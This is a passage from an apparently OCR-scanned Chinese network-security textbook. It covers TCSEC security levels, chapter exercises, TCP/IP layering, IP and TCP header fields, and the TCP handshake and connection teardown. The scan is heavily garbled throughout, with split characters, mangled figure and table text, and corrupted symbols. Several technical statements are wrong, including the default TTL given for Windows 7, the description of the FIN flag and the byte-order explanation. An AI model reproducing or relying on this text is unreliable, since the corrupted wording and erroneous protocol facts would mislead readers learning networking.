种 程度 的 保护 ,如 用 户 拥有 注册 账号 和 口令 ,系统 通过 账号 和 口令 来 识别 用 户 是 否 合 法 ,并 
决定 用 户 对 程序 和 信息 拥有 什么 样 的 访问 权 , 但 硬件 受到 损害 的 可 能 性 仍然 存在 。 用 户 拥 
有 的 访问 权 是 指 对 文件 和 目标 的 访问 权 。 文 件 的 拥有 者 和 超级 用 户 可 以 改变 文件 的 访问 属 
性 ,从 而 对 不 同 的 用 户 授予 不 同 的 访问 权限 。 

C2 级 除了 包含 Cl 级 的 特征 外 ,应 该 具有 访问 控制 环境 (Controlled Access Environment) 
权力 。 该 环境 具有 进一步 限制 用 户 执 行 某 些 命令 或 者 访问 某 些 文件 的 权限 ,而 且 还 加 入 了 
身份 认证 等 级 。 另 外 ,系统 对 发 生 的 事情 加 以 审计 ,并 写 入 日 志 中 ,如 什么 时 候 开 机 ,哪个 用 
户 在 什么 时 候 从 什么 地 方 登录 ,等 等 ,这 样 通过 查看 日 志 , 就 可 以 发 现 和 人 侵 的 痕迹 ,如 多 次 登 
录 失 败 , 也 可 以 大 致 推测 出 可 能 有 人 想 入 侵 系统 。 审 计 除 了 可 以 记录 下 系统 管理 员 执 行 的 
活动 以 外 ,还 加 入 了 身份 认证 级 别 , 这 样 就 可 以 知道 谁 在 执行 这 些 命令 。 审 计 的 缺点 在 于 它 
需要 额外 的 处 理 时 间 和 磁盘 空间 。 使 用 附加 身份 验证 就 可 以 让 一 个 C2 级 系统 用 户 在 不 是 
超级 用 户 的 情况 下 有 权 执 行 系统 管理 任务 。 授 权 分 级 使 系统 管理 员 能 够 给 用 户 分 组 ,授予 
他 们 访问 某 些 程序 的 权限 或 访问 特定 的 目录 。 能 够 达到 C2 级 别 的 常见 操作 系统 如 下 : 

(1) UNIX 5; 

(2) Novell 3. X 或 者 更 高 版 本 ; 

(3) Windows NT,Windows 2000 和 Windows 2003, 

B 级 中 有 三 个 级 别 ,Bl 级 即 标志 安全 保护 (Labeled Security Protection) ,是 支持 多 级 
安全 (例如 : 秘密 和 绝密 ) 的 第 一 个 级 别 , 这 个 级 别 说 明 处 于 强制 性 访问 控制 之 下 的 对 象 , 系 
统 不 允许 文件 的 拥有 者 改变 其 许可 权限 。 安 全 级 别 存在 保密 、 绝 密级 别 ,这 种 安全 级 别 的 计 
算 机 系统 一 般 在 政府 机 构 中 ,比如 国防 部 和 国家 安全 局 的 计算 机 系统 。 

B2 级 ,又 叫 结构 保护 级 别 (Structured Protection) , 它 要 求 计算 机 系统 中 所 有 的 对 象 都 
要 加 上 标签 ,而且 给 设备 (磁盘 、 磁 带 和 终端 ) 分 配 单个 或 者 多 个 安全 级 别 。 

B3 级 ,又 叫 作 安全 域 级 别 (Security Domain) ,使 用 安装 硬件 的 方式 来 加 强 域 的 安全 , 例 
如 ,内 存 管理 硬件 用 于 保护 安全 域 免 遭 无 授权 访问 或 更 改 其 他 安全 域 的 对 象 。 该 级 别 也 要 
求 用 户 通过 一 条 可 信任 途径 连接 到 系统 上 。 

A 级 ,又 称 验证 设计 级 别 (Verified Design) ,是 当前 橙 皮 书 的 最 高 级 别 , 它 包含 一 个 严 
格 的 设计 ,控制 和 验证 过 程 。 该 级 别 包 含 较 低 级 别 的 所 有 的 安全 特性 设计 必须 从 数学 角度 
上 进行 验证 ,而 且 必 须 进 行 秘密 通道 和 可 信任 分 布 分 析 。 可 信任 分 布 (Trusted Distribution) 的 
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含义 是 : 硬件 和 软件 在 物理 传输 过 程 中 已 经 受到 保护 ,以 防止 破坏 安全 系统 。 
橙 皮 书 也 存在 不 足 。TCSEC 是 针对 孤立 计算 机 系统 ,特别 是 小 型 计算 机 和 主机 系统 。 
假设 有 一 定 的 物理 保障 ,该 标准 适合 政府 和 军队 ,不 适合 企业 ,这 个 模型 是 静态 的 。 


习题 


一 、 填空 题 
1. 网 络 安全 的 目标 CIA 指 的 是 
2. 网 络 安全 的 保密 性 包括 

3. 保障 网 络 信息 完整 性 的 方法 有 
4. 网 络 安全 威胁 包括 

5. 物理 威胁 包括 
6 
74 
8 
9 


.身份 鉴别 造成 的 威胁 包括 

.网 络 安全 的 研究 内 容 分 为 两 大 体系 : š 。 

. SYN 是 针对 层 的 攻击 ,Smurf 是 针对 层 的 攻击 。 

.网 络 攻击 5 步 是 

10. 网 络 防御 技术 包括 

二 、 简 答题 

1. 分 别 举 两 个 例子 说 明 网 络 安全 与 政治 、 经 济 、 社 会 稳定 和 军事 的 联系 。 
2. 我 国 关 于 网 络 安全 的 立法 有 哪些 ? 

3. 我 国 关于 网 络 安全 的 评价 标准 内 容 是 什么 ? 

4. 国际 关于 网 络 安全 的 评价 标准 内 容 是 什么 ? 


第 2 


学 习 目 标 : 


I 


ni 


网 络 安全 协议 基础 


m 掌握 IP.TCP.UDP 和 ICMP。 


m 掌握 文件 传输 服务 Telnet 服务 .电子 邮件 服务 和 Web 服务 。 


m 掌握 常用 的 网 络 服务 端口 和 常用 的 网 络 命令 的 使 用 。 


国际 标准 化 组 织 (International Standards Organization ,ISO) 把 计算 机 与 计算 机 之 间 的 
通信 分 成 7 个 互相 连接 的 协议 层 , 由 低 到 高 分 别 是 物理 层 .数据 链 路 层 、 网 络 层 .传输 层 、 会 
话 层 、 表 示 层 应 用 层 , 很 少 有 产品 完全 符合 7 层 模型 ,然而 7 层 参 考 模型 为 网 络 的 结构 提供 


了 可 行 的 机 制 。 


TCP/IP 是 Transmission Control Protocol/Internet Protocol 的 简写 ,中文 译名 为 传输 
控制 协议 /因特网 互联 协议 ,又 名 网 络 通信 协议 ,是 Internet 最 基本 的 协议 、Internet 国际 互 
联网 络 的 基础 ,由 网 络 层 的 IP 和 传输 层 的 TCP 组成。TCP/IP 定义 了 电子 设备 如 何 连 入 
因特网 ,以 及 数据 如 何在 它们 之 间 传 输 的 标准 。 协 议 采 用 了 4 层 的 层级 结构 ,每 一 层 都 调用 


它 的 下 一 层 所 提供 的 协议 来 完成 自己 的 需求 。 


TCP/IP 组 的 4 JE OSI 参考 模型 和 常用 协议 的 对 应 关系 如 图 2-1 所 示 ,虽然 一 般 标 识 
为 TCP/IP, 但 实际 上 在 TCP/IP 协议 族 内 有 很 多 不 同 的 协议 ,常用 的 有 IP, TCP, UDP, 


ICMP,ARP 等 。 


OSI 模型 TCP/IP 模 型 
应 用 层 
TCP/IP 协 议 组 
表示 层 应 用 层 “| ! 1 
会 话 层 Telnet | | FTP || SMTP | | DNS RIP | | SNMP | 
传输 层 传输 层 TCP UDP | 
网 络 层 Internet 层 ARP IP IGMP | ICMP | 
数据 链 路 层 ——R qose —— E 
网 络 接口 层 | ， UAA 11 令 牌 环 1a 帧 中 继 10 ATM |! 
物理 屋 || [|t----v------ Ji 3 as xL d. aem 4i 


2.1.1 IP fix 


IP 是 Internet Protocol( 网 络 之 间 互 连 的 协议 ) 的 缩写 ,中文 简称 为 “网 协 ” ,也 就 是 为 计 


2-1 TCP/IP 和 OSI 的 对 应 关系 


2.1 常用 的 网 络 协议 
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算 机 网 络 相互 连接 进行 通信 而 设计 的 协议 。 在 因特网 中 , 它 是 能 使 连接 到 网 上 的 所 有 计算 
机 网 络 实现 相互 通信 的 一 套 规则 ,规定 了 计算 机 在 因特网 上 进行 通信 时 应 当 遵守 的 规则 , 任 
何 厂家 生产 的 计算 机 系统 ,只 要 遵守 IP 协议 就 可 以 与 因特网 互联 互通 。IP 是 网 络 层 上 的 
主要 协议 ,同时 被 TCP 和 UDP 使 用 ,基本 原理 如 下 。 

1. 网 络 互联 

以 太 网 ,分 组 交换 网 相互 之 间 不 能 互通 ,主要 原因 是 它们 所 传送 数据 的 基本 单元 (技术 
上 称 之 为 “ 帧 ”的 格式 不 同 。IP 协议 实际 上 是 一 套 由 软件 ,程序 组 成 的 协议 软件 , 它 把 各 种 
不 同 的 “ 帧 "统一 转换 成 “IP 数据 包 ” 格 式 , 这 种 转换 是 因特网 的 一 个 最 重要 的 特点 ,使 所 有 
各 种 计算 机 都 能 在 因特网 上 实现 互通 , 即 具有 “开放 性 ”的 特点 。 

2. 数据 包 

数据 包 也 是 分 组 交换 的 一 种 形式 ,就 是 把 所 传送 的 数据 分 段 打 成 “ 包 ”, 再 传送 出 去 。 
但 是 ,与 传统 的 “连接 型 "分 组 交换 不 同 , 它 属于 “无 连接 型 ", 是 把 打 成 的 每 个 “ 包 ”( 分 组 ) 都 
作为 一 个 “独立 的 报 文 ”传送 出 去 ,所 以 叫 作 "数据 包 ”。 这 样 ,在 开始 通信 之 前 就 不 需要 先 连 
接 好 一 条 电路 ,各 个 数据 包 不 一 定 都 通过 同一 条 路 径 传输 ,所 以 叫 作 * 无 连接 型 ”。 这 一 特点 
非常 重要 , 它 大 大 提高 了 网 络 的 坚固 性 和 安全 性 。 每 个 数据 包 都 有 报头 和 报 文 这 两 个 部 分 ， 
报头 中 有 目的 地 址 等 必要 内 容 ,使 每 个 数据 包 不 经 过 同样 的 路 径 都 能 准确 地 到 达 目 的 地 ,在 
目的 地 重新 组 合 还 原 成 原来 发 送 的 数据 。 这 就 要 求 IP 具有 分 组 打包 和 集合 组 装 的 功能 。 


2.1.2 JIP 头 结构 


在 网 络 协议 中 ,IP 是 面向 非 连接 的 ,所 谓 的 非 连 接 就 是 在 传递 数据 的 时 候 不 检测 网 络 
是 否 连通 ,所 以 是 不 可 靠 的 数据 报 协 议 。IP 协议 主要 负责 在 主机 之 间 寻 址 和 选择 数据 包 
路 由 。 

IP 数据 包 指 一 个 完整 的 IP 信息 ,IP 的 功能 定义 在 IP 头 结构 中 ,IP 头 结构 如 图 2-2 
所 示 。 
0 78 15 16 31 


版 本 号 (4b) | 头 长 度 (4b) 服务 类 型 TOS(8b) 总 长 度 (16b) 
标识 (16b) 标志 (3b) 片 偏 移 (13b) 
生存 时 间 TTL(8b) 上 层 协议 标识 (8b) 头 部 校 验 和 (16b) 
源 IP 地 址 (32b) 报头 区 


目标 IP 地 址 (32b) 


选项 


数据 数据 区 


图 2-2 IP 头 结构 
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IP 头 结构 在 所 有 协议 中 都 是 固定 的 ,图 2-2 说 明 如 下 。 

CD 版 本 号 (Version) : 长 度 4b。 作 用 是 标识 目前 采用 的 IP 协议 的 版 本 号 。 一 般 的 值 
为 0100(IPv4) .0110CIPv6) 。 

(2) IP 包头 长 度 (Header Length): 长 度 4b。 这 个 字段 的 作用 是 为 了 描述 IP 包头 的 长 
度 , 因 为 在 IP 包头 中 有 变 长 的 可 选 部 分 。 该 部 分 占 4b, 单 位 为 32b(4B), 即 本 区 域 值 =IP 
头 部 长 度 ( 单 位 为 b)/(8X4), 因 此 ,一 个 耳 包 头 的 长 度 最 长 为 "1111”, 即 15X4 一 60B。 普 
38 IP 数据 报 该 字段 的 值 是 5( 即 20B 的 长 度 ) 。 

(3) 服务 类 型 TOS(Type of Service): KÆ 8b, 按 位 进行 如 下 定义 , 见 图 2-3. 


0 1 2 3 4 5 6 7 
tan |D | T | R | 保留 ] 
图 2-3 服务 类 型 


优先 权 : 占 0 一 2 位 ,这 三 位 二 进 制 数 表 示 的 数据 范围 为 000 一 111(0 一 7) , 取 值 越 大 , 数 
据 越 重要 。 

短 延迟 位 DCDelay) : 该 位 被 置 1 时 ,数据 报请 求 以 短 延 时 信道 传输 ,0 表示 正常 延 时 。 

高 吞吐 量 位 T(Throughput) : 该 位 被 置 1 时 ,数据 报请 求 以 高 乔 吐 量 信道 传输 ,0 表示 
普通 。 

高 可 靠 性 位 RCReliability) : 该 位 被 置 1 时 ,数据 报请 求 以 高 可 靠 性 信道 传输 ,0 表示 
普通 。 
保留 位 : 第 6 位 和 第 7 位 ,目前 未 用 ,但 需 置 0。 应 注意 在 有 些 实现 中 ,可 以 使 用 第 6 位 
表示 低 成 本 。 

对 不 同 应 用 ,TOS 的 建议 数据 值 列 于 表 2-1 中 ,例如 ,对 于 Telnet 数据 值 是 10 000( 二 
进 制 ) 转 换 成 十 六 进 制 是 0x10。 


表 2-1 TOS 的 建议 数据 值 


短 延 迟 位 高 吞吐 高 可 靠 十 六 进 

应 用 程序 量 位 工 性 位 及 低 成 本 位 sid 特 性 
Telnet 1 0 0 0 0x10 短 延 迟 
FTP 控制 1 0 0 0 0x10 短 延迟 
FTP 数据 0 1 0 0 0x08 高 吞吐 量 
TFTP 1 0 0 0 0x10 短 延 迟 
SMTP 命令 1 0 0 0 0x10 短 延 迟 
SMTP 数据 0 1 0 0 0x08 高 吞吐 量 
DNS UDP 查询 1 0 0 0 0x10 短 延 迟 
DNS TCP 查询 0 0 0 0 0x00 普通 
DNS 区 域 传 输 0 1 0 0 0x08 高 吞吐 量 
ICMP 差错 0 0 0 0 0x00 普通 
ICMP 查询 0 0 0 0 0x00 普通 
SNMP 0 0 1 0 0x04 高 可 靠 性 
IGP 0 0 d 0 0x04 高 可 靠 性 
NNTP 0 0 0 1 0x02 低 成 本 


22 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


(4) 封包 总 长 度 : 总 长 度 用 16 位 二 进 制 数 表 示 ,总 长 度 字段 是 指 整个 IP 数据 报 的 长 
度 , 以 B 为 单位 ,所 以 IP 包 最 大 长 度 65 535B。 

(5) 标识 : 长 度 16b。 该 字段 和 Flags 和 Fragment Offest 字段 联合 使 用 ,对 较 大 的 上 
层 数据 包 进行 分 段 操作 。 路 由 器 将 一 个 包 拆 分 后 ,所 有 拆 分 开 的 小 包 被 标记 相同 的 值 , 以 便 
目的 端 设备 能 够 区 分 哪个 包 属于 被 拆 分 开 的 包 的 一 部 分 。 

(6) 标志 (Flags): 让 目的 主机 来 判断 新 来 的 分 段 属 于 哪个 分 组 ,长度 3b。 该 字段 第 一 
位 不 使 用 。 第 二 位 是 DF(ODon't Fragment) 位 ,DF 位 设 为 1 时 表明 路 由 器 不 能 对 该 上 层 数 
据 包 分 段 。 如 果 一 个 上 层 数据 包 无 法 在 不 分 段 的 情况 下 进行 转发 , 则 路 由 器 会 丢弃 该 上 层 
数据 包 并 返回 一 个 错误 信息 。 第 三 位 是 MF(More Fragments) 位 , 当 路 由 器 对 一 个 上 层 数 
据 包 分 段 , 则 路 由 器 会 在 除了 最 后 一 个 分 段 的 IP 包 的 包头 中 将 MF 位 设 为 1。 

(7) F mE (Fragment Offset): 长 度 13b。 表 示 该 IP 包 在 该 组 分 片 包 中 的 位 置 ,接收 
端 靠 此 来 组 装 还 原 卫 包 。 

(8) 存活 时 间 (Time To Live, TTL): 生存 时 间 用 8 位 二 进 制 数 表示 , 它 指定 了 数据 报 
可 以 在 网 络 中 传输 的 最 长 时 间 。 在 实际 应 用 中 为 了 简化 处 理 过 程 ,把 生存 时 间 字 段 设置 成 
了 数据 报 可 以 经 过 的 最 大 路 由 器 数 。TTL 的 初始 值 由 源 主机 设置 (通常 为 32、64、128 或 者 
256) ,一 旦 经 过 一 个 处 理 它 的 路 由 器 , 它 的 值 就 减 去 1。 当 该 字段 的 值 减 为 0 时 ,数据 报 就 
被 丢弃 ,并 发 送 ICMP 报 文通 知 源 主机 ,这 样 可 以 防止 进入 一 个 循环 回路 时 ,数据 报 无 休止 
地 传输 ,用 ping 命令 ,得 到 对 方 的 TTL 值 时 ,可 以 判断 对 方 使 用 的 操作 系统 的 类 型 ,默认 情 
况 下 ,Linux 系统 的 TTL 值 为 64 或 255, Windows NT/2000/XP 系统 的 默认 TTL fü 
128. Windows 7 系统 的 TTL 值 是 64. Windows 98 系统 的 TTL 值 为 32. UNIX 主机 的 
TTL 值 为 255。 

(9) 协议 (Protocol) : 长 度 8b。 标 识 了 上 层 所 使 用 的 协议 ,常用 的 网 际 协议 编号 见 表 2-2。 


表 2-2 常用 网 际 协议 编号 


十 进 制 编号 box 说 Hm 
0 x 保留 
1 ICMP 网 际 控制 报 文 协议 
2 IGMP 网 际 组 管理 协议 
3 GGP 网 关 - 网 关 协 议 
4 无 未 分 配 
5 ST 流 
6 TCP 传输 控制 协议 
8 EGP 外 部 网 关 协 议 
9 IGP 内 部 网 关 协 议 
ii NVP 网 络 声音 协议 
17 UDP 用 户 数据 报 协 议 


(10) 校 验 和 : 首先 将 该 字段 设置 为 0, 然 后 将 IP 头 的 每 16 位 进行 二 进 制 取 反 求 和 ,将 
结果 保存 在 校 验 和 字段 。 

(11) 来 源 IP 地 址 : 将 IP 地 址 看 作 是 32 位 数值 则 需要 将 网 络 字 节 顺序 转化 为 主机 字 
节 顺 序 。 转 化 的 方法 是 : 将 每 4 个 字 节 首尾 互 换 , 将 2、3 字 节 互 换 。 
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(2) 目的 IP 地 址 : 转换 方法 和 来 源 IP 地 址 一 样 。 

用 工具 软件 Sniffer 和 Wireshark 抓 到 的 头 结构 如 下 ,Sniffer 和 Wireshark 工具 软件 的 
使 用 见 实 验 部 分 的 实验 1 和 实验 2。 

抓 到 的 IP 头 部 : 45 00 00 30 52 52 40 00 80 06 2c 23 cO a8 01 01 d8 03 e2 15 

分 析 : 

“4” 是 IP 协议 的 版 本 (Version) ,说 明 是 IPv4, 新 的 版 本 号 为 6, 现 在 IPv6 还 没有 普遍 
使 用 。 

“5” 表 示 IP 头 部 的 长 度 , 是 一 个 4b 长 的 字段 ,说 明 是 20B, 这 是 标准 的 TP 头 部 长 度 。 

“00” 是 服务 类 型 (Type of Service) 。 这 个 8b 字段 由 3b 的 优先 权 子 字段 (现在 已 经 
忽略 ) ,4b 的 TOS 子 字段 包含 最 小 延 时 、 最 大 吞吐 量 、 最 高 可 靠 性 以 及 最 小 费用 构成 ,这 4 
个 1b 最 多 只 能 有 一 个 为 1, 本 例 中 都 为 0, 表 示 是 一 般 服务 。 

接着 的 两 个 字 节 “00 30” 是 TP 数据 报 文 总 长 ,包含 头 部 以 及 数据 。 

再 是 两 个 字 节 的 标志 位 (Identification):“5252( 十 六 进 制 )”, 转 换 为 十 进 制 就 是 
21074。 这 是 让 目的 主机 来 判断 新 来 的 分 段 属于 哪个 分 组 。 

下 一 个 字 节 “40”, 转 换 为 二 进 制 就 是 *0100 0000”, 其 中 第 一 位 是 IP 协议 目前 没有 用 上 
的 ,为 0。 接 着 的 是 两 个 标志 DF 和 MF. DF 为 1 表示 不 要 分 段 ,MF 为 1 表示 还 有 进一步 
的 分 段 ( 本 例 为 0)。 然 后 的 “0 0000” 是 分 段 偏 移 (Fragment Offset). 

“80” 这 个 字 节 就 是 TTL(Time To Live) 了 ,表示 一 个 IP 数据 流 的 生命 周期 ,用 ping 显 
示 的 结果 ,能 得 到 TTL 的 值 。 一 般 主 机 都 有 默认 的 TTL 值 ,不 同系 统 的 默认 值 不 一 样 。 
比如 Windows 为 128, 本 例 中 为 “80”, 转 换 为 十 进 制 就 是 128 T. ping 的 机 器 是 
Windows 2000, 

接 下 来 的 是 “06”, 这 个 字 节 表示 传输 层 的 协议 类 型 (Protocol) 。 在 RFC790 中 有 定义 ， 
6 表示 传输 层 是 TCP。 

“2c 23"3X 16b 是 头 校 验 和 (Header Checksum) 。 

接 下 来 “c0 a8 01 01" JE Wdb ht (Source Address) ,也 就 是 IP 地 址 (十 六 进 制 转换 成 十 
进 制 ) 。 

转换 为 十 进 制 的 IP 地 址 就 是 192. 168. 1. 1 ,同样 , 接 下 来 的 32 位 “d8 03 e2 15” 是 目标 
地 址 216. 3. 226. 21. 


2.1.3 传输 控制 协议 TCP 


在 因特网 协议 族 中 ,TCP 层 是 位 于 IP 层 之 上 ,应 用 层 之 下 的 中 间 层 , 即 TCP 是 传输 层 
协议 ,不 同 主机 的 应 用 层 之 间 经 常 需要 可 靠 的 、 像 管道 一 样 的 连接 ,但 是 IP 层 不 提供 这 样 的 
流 机 制 ,而 是 提供 不 可 靠 的 包 交 换 , 而 TCP 提供 可 靠 的 应 用 数据 传输 。TCP 在 两 个 或 多 个 
主机 之 间 建 立 面向 连接 的 通信 。 

应 用 层 向 TCP 层 发 送 用 于 网 间 传 输 的 、 用 8 个 字 节 表示 的 数据 流 , 然 后 TCP 把 数据 流 
分 割 成 适当 长 度 的 报 文 段 ( 通 常 受 该 计算 机 连接 的 网 络 的 数据 链 路 层 的 最 大 传送 单元 的 限 
制 )。 之 后 TCP 把 结果 包 传 给 IP 层 , 由 它 来 通过 网 络 将 包 传送 给 接收 端 实体 的 TCP 层 。 
TCP 为 了 保证 不 发 生 丢 包 ,就 给 每 个 字 节 一 个 序号 ,同时 序号 也 保证 了 传送 到 接收 端 实体 
的 包 的 按 序 接收 。 然 后 接收 端 实体 对 已 成 功 收 到 的 字 节 发 回 一 个 相应 的 确认 (ACK) ,如果 
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发 送 端 实体 在 合理 的 往返 时 延 (RTT) 内 未 收 到 确认 ,那么 对 应 的 数据 (假设 丢失 了 ) 将 会 被 
重 传 。TCP 用 一 个 校 验 和 函数 来 检验 数据 是 否 有 错误 ; 在 发 送 和 接收 时 都 要 计算 校 验 和 。 
首先 ,TCP 建立 连接 之 后 ,通信 双方 都 同时 可 以 进行 数据 的 传输 ,其 次 , 它 是 全 双 工 的 ; 在 
保证 可 靠 性 上 ,采用 超时 重 传 和 撒 带 确 认 机 制 。 

和 IP 一 样 ,TCP 的 功能 受 限 于 其 头 中 携带 的 信息 。 因 此 理解 TCP 的 机 制 和 功能 需要 
了 解 TCP 头 中 的 内 容 , 图 2-4 显示 了 TCP 头 结构 。 


来 源 端口 (2B) 目的 端口 (2B) 
序号 (4B) 确认 序号 (4B) 
头 长 度 (4b) 保留 (6b) 
URG ACK PSH RST SYN FIN 
窗口 大 小 (2B) 校 验 和 (16b) 
紧急 指针 (16b) 选项 (可 选 ) 
数据 


图 2-4 TCP 头 结构 


对 图 2-4 说 明 如 下 。 

(1) TCP 源 端 口 (Source Port); 16 位 的 源 端口 包含 初始 化 通信 的 端口 号 。 源 端口 和 
IP 地 址 的 作用 是 标识 报 文 的 返回 地 址 。 

(2) TCP 目的 端口 (Destination Port): 16 位 的 目的 端口 域 定 义 传输 的 目的 。 这 个 端 
口 指明 报 文 接收 计算 机 上 的 应 用 程序 地 址 接口 。 

G) 序列 号 (Sequence Number): 序列 号 长 度 为 32 位 ,TCP 连 线 发 送 方向 接收 方 的 封 
包 顺 序号 。 

(4) 确认 序号 (Acknowledge Number): 确认 号 长 度 为 32 位 ,接收 方 回 发 的 应 答 顺 
序号 。 

(5) 头 长 度 (Header Length): 表示 TCP 头 的 双 四 字 节 数 ,如 果 转 化 为 字 节 个 数 需 要 乘 
以 4,TCP 头 部 长 度 一 般 为 20B, 因 此 通常 它 的 值 为 5。 

(6) URG: 是 否 使 用 紧急 指针 ,0 为 不 使 用 ,1 为 使 用 。 

C) ACK: 请 求 /应 答 状 态 。0 为 请 求 ,1 为 应 答 。 

(8) PSH: 以 最 快 的 速度 传输 数据 。 置 1 时 请 求 的 数据 段 在 接收 方 得 到 后 就 可 直接 送 
到 应 用 程序 ,而 不 必 等 到 缓冲 区 满 时 才 传送 。 

(9) RST: 连 线 复位 ,首先 断 开 连 接 , 然 后 重建 。 

(10) SYN; 同步 连 线 序号 ,用 来 建立 连 线 。 在 连接 请 求 中 ,SYN=1,ACK=0; 连接 响 
应 时 ,SYN==1,ACK=1; WAR .SYN—O0.ACK-—1. 

(QD FIN: 结束 连 线 。 如 果 FIN 为 0 是 结束 连 线 请 求 ,FIN 为 1 表示 结束 连 线 。ACK== 
1,FIN=1; ACK=1,FIN=0; ACK=1;FIN=1; ACK—1.FIN—0, 

(12) A AAK Window): 目的 机 使 用 16 位 的 域 告诉 源 主机 , 它 想 收 到 的 每 个 TCP 数 
据 段 大 小 。 

(13) 校 验 和 (Checksum) : 这 个 校 验 和 IP. 头 的 校 验 和 有 所 不 同 ,不 仅 对 头 数据 进行 校 
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验 , 还 对 封包 内 容 进 行 校 验 。 
(14) 紧急 指针 (Urgent Pointer): 当 URG 为 1 的 时 候 才 有 效 。TCP 的 紧急 方式 是 发 
送 紧 急 数据 的 一 种 方式 。 


2.1.4 TCP 的 工作 原理 


TCP 提供 两 个 网 络 主机 之 间 的 点 对 点 通信 。TCP 从 程序 中 接收 数据 并 将 数据 处 理 成 
字 节 流 。 首 先 将 字 节 分 成 段 , 然 后 对 段 进行 编号 和 排序 以 便 传输 。 在 两 个 TCP 主机 之 间 交 
换 数据 之 前 ,必须 先 相 互 建立 会 话 。TCP 会 话 通过 三 次 握手 完成 初始 化 。 这 个 过 程 使 序号 
同步 ,并 提供 在 两 个 主机 之 间 建 立 虚拟 连接 所 需 的 控制 信息 。 

TCP 在 建立 连接 的 时 候 需要 三 次 确认 ,俗称 “三 次 握手 ”, 在 断 开 连接 的 时 候 需 要 4 次 
确认 ,俗称 “四 次 挥手 ”。 

CD 连接 : 在 TCP/IP 中 ,TCP 提供 可 靠 的 连接 服务 ,采用 三 次 握手 建立 一 个 连接 。 所 
谓 三 次 握手 ,就 是 指 在 建立 一 条 连接 时 通信 双方 要 交换 三 次 报 文 ,如 图 2-5 所 示 。 


192.168.1.116 192.168.1.123 


我 可 以 连接 到 你 吗 ? 


当然 可 以 


那 我 就 不 客气 了 
Y 1 
图 2-5 三 次 握手 


具体 过 程 如 下 。 

第 一 次 握手 : 由 客户 机 的 应 用 层 进程 向 其 传输 层 TCP 发 出 建立 连接 的 命令 , 则 客户 机 
TCP 向 服务 器 上 提供 某 特定 服务 的 端口 发 送 一 个 请 求 建立 连接 的 报 文 段 ,该 报 文 段 中 SYN 
被 置 1, 同 时 包含 一 个 初始 序列 号 z( 系 统 保持 着 一 个 随时 间 变 化 的 计数 器 ,建立 连接 时 该 计 
数 器 的 值 即 为 初始 序列 号 ,因此 不 同 的 连接 初始 序列 号 不 同 ) 。 

第 二 次 握手 : 服务 器 收 到 建立 连接 的 请 求 报 文 段 后 ,发 送 一 个 包含 服务 器 初始 序号 y. 
SYN 被 置 1 ,确认 号 置 为 z 十 1 的 报 文 段 作 为 应 答 。 确 认 号 加 1 是 为 了 说 明 服务 器 已 正确 收 
到 一 个 客户 连接 请 求 报 文 段 , 因 此 从 逻辑 上 来 说 ,一 个 连接 请 求 占 用 了 一 个 序号 。 

第 三 次 握手 : 客户 机 收 到 服务 器 的 应 答 报 文 段 后 ,也 必须 向 服务 器 发 送 确认 号 为 > 十 1 
的 报 文 段 进行 确认 。 同 时 客户 机 的 TCP 层 通知 应 用 层 进程 ,连接 已 建立 ,可 以 进行 数据 传 
输 了 。 

完成 三 次 握手 ,客户 端 与 服务 器 开始 传送 数据 ， 

COD XH]. 需要 断 开 连接 的 时 候 ,TCP 也 需要 互相 确认 才 可 以 断 开 连 接 , 俗 称 * 四 次 挥 
手 ”, 如 图 2-6 所 示 。 

具体 过 程 如 下 。 

第 一 次 挥手 : 由 客户 机 的 应 用 进程 向 其 TCP 层 发 出 终止 连接 的 命令 , 则 客户 TCP 层 
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192.168.1.116 192.168.1.123 


服务 器 
我 要 结束 连接 
当然 可 以 刁 
Ir: 终止 了 
m 好 ， 收 到 
! ^i 
H2-6 四 次 挥手 


向 服务 器 TCP 层 发 送 一 个 FIN 被 置 1 的 关闭 连接 的 TCP 报 文 段 。 

第 二 次 挥手 : 服务 器 的 TCP 层 收 到 关闭 连接 的 报 文 段 后 ,就 发 出 确认 ,确认 号 为 已 收 
到 的 最 后 一 个 字 节 的 序列 号 加 1, 同 时 把 关闭 的 连接 通知 其 应 用 进程 ,告诉 它 客 户 机 已 经 终 
止 了 数据 传送 。 在 发 送 完 确认 后 ,服务 器 如 果 有 数据 要 发 送 , 则 客户 机 仍然 可 以 继续 接收 数 
据 ,因此 把 这 种 状态 叫 作 半 关闭 (half-close) 状 态 , 因 为 服务 器 仍然 可 以 发 送 数 据 ,并 且 可 以 
收 到 客户 机 的 确认 ,只 是 客户 方 已 无 数据 发 向 服务 器 了 。 

第 三 次 挥手 : 如 果 服 务 器 应 用 进程 也 没有 要 发 送 给 客户 方 的 数据 了 ,就 通告 其 TCP 层 
关闭 连接 。 这 时 服务 器 的 TCP 层 向 客户 机 的 TCP 层 发 送 一 个 FIN 置 1 的 报 文 段 ,要 求 关 
闭 连 接 。 

第 四 次 挥手 : 同样 ,客户 机 收 到 关闭 连接 的 报 文 段 后 ,向 服务 器 发 送 一 个 确认 ,确认 号 
为 已 收 到 数据 的 序列 号 加 1。 当 服务 器 收 到 确认 后 ,整个 连接 被 完全 关闭 。 

实例 : 

IP 192.168.1.116.3337 > 192.168.1.123.7788: S 3626544836:3626544836 

IP 192.168.1.123.7788 > 192.168.1.116.3337: S 1739326486:1739326486 ACK 3626544837 

IP 192.168.1.116.3337 > 192.168.1.123.7788: ACK 1739326487, ACK 1 

第 一 次 握手 : 192. 168. 1. 116 发 送 位 码 SYN==1, 随 机 产生 SEQ Number 一 3626544836 
的 数据 包 到 192. 168. 1. 123.192. 168. 1. 123, 由 SYN — 1 知道 192. 168. 1. 116 要 求 建立 
联机 。 

第 二 次 握手 : 192. 168. 1. 123 收 到 请 求 后 要 确认 联机 信息 ,向 192. 168. 1. 116 发 送 
ACK Number— 3626544837, SYN—1. ACK==1, 随 机 产生 SEQ=1739326486 的 包 。 

第 三 次 握手 : 192. 168. 1. 116 收 到 后 检查 ACK Number 是 否 正确 , 即 第 一 次 发 送 的 
SEQ Number 十 1, 以 及 位 码 ACK 是 否 为 1, 若 正确 ,192. 168. 1. 116 会 再 发 送 ACK Number 一 
1739326487,ACK 王 1,192. 168. 1. 123 收 到 后 确认 SEQ— SEQ-- 1. ACK — 1 则 连接 建立 
成 功 。 

具体 操作 请 参考 实验 3. 


2.1.5 用 户 数据 报 协议 UDP 
用 户 数据 报 协议 (User Datagram Protocol，UDP) 是 一 个 简单 的 面向 数据 报 的 传输 层 
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协议 ,在 TCP/IP 模型 中 ,UDP 为 网 络 层 以 下 和 应 用 层 以 上 提供 了 一 个 简单 的 接口 。UDP 
